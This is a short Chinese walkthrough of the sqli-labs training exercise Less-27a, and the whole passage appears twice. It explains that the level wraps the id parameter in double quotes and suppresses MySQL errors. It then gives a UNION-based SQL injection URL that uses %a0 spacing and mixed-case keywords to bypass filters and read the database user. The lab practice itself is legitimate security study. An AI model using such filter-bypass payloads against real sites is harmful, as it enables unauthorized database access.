Less-27a
本关与第27关的去呗在于对于ID的处理,这里使用了“ ””,同时mysql的错误提示被屏蔽,所以报错注入无法进行。对于过滤的绕过技巧在上一节中已经讲过了,这里不再多说了。下面给出一个payload:
http://192.168.11.136/sqli-labs/Less-27a?id=-1"%a0UnIon%a0SElecT%a01,user(),"3
读者有兴趣可以自己测试哈!
Less-27a
本关与第27关的去呗在于对于ID的处理,这里使用了“ ””,同时mysql的错误提示被屏蔽,所以报错注入无法进行。对于过滤的绕过技巧在上一节中已经讲过了,这里不再多说了。下面给出一个payload:
http://192.168.11.136/sqli-labs/Less-27a?id=-1"%a0UnIon%a0SElecT%a01,user(),"3
读者有兴趣可以自己测试哈!